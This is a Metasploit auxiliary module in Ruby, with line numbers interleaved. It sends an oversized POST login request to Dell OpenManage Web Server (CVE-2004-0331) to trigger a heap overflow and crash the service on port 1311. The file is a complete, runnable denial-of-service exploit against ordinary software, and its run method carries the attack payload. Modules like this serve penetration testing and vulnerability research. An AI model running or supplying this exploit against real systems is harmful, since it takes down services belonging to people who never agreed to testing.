1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Auxiliary
7
  include Msf::Exploit::Remote::Tcp
8
  include Msf::Auxiliary::Dos
9

10
  def initialize(info = {})
11
    super(
12
      update_info(
13
        info,
14
        'Name' => 'Dell OpenManage POST Request Heap Overflow (win32)',
15
        'Description' => %q{
16
          This module exploits a heap overflow in the Dell OpenManage
17
          Web Server (omws32.exe), versions 3.2-3.7.1. The vulnerability
18
          exists due to a boundary error within the handling of POST requests,
19
          where the application input is set to an overly long file name.
20
          This module will crash the web server, however it is likely exploitable
21
          under certain conditions.
22
        },
23
        'Author' => [ 'aushack' ],
24
        'License' => MSF_LICENSE,
25
        'References' => [
26
          [ 'URL', 'http://archives.neohapsis.com/archives/bugtraq/2004-02/0650.html' ],
27
          [ 'BID', '9750' ],
28
          [ 'OSVDB', '4077' ],
29
          [ 'CVE', '2004-0331' ],
30
        ],
31
        'DisclosureDate' => '2004-02-26',
32
        'Notes' => {
33
          'Stability' => [CRASH_SERVICE_DOWN],
34
          'SideEffects' => [],
35
          'Reliability' => []
36
        }
37
      )
38
    )
39

40
    register_options(
41
      [
42
        Opt::RPORT(1311),
43
        OptBool.new('SSL', [true, 'Use SSL', true]),
44
      ]
45
    )
46
  end
47

48
  def run
49
    connect
50

51
    foo = 'user=user&password=password&domain=domain&application=' + Rex::Text.pattern_create(2000)
52

53
    sploit = "POST /servlet/LoginServlet?flag=true HTTP/1.0\r\n"
54
    sploit << "Content-Length: #{foo.length}\r\n\r\n"
55
    sploit << foo
56

57
    sock.put(sploit + "\r\n\r\n")
58

59
    disconnect
60
  end
61
end
62

63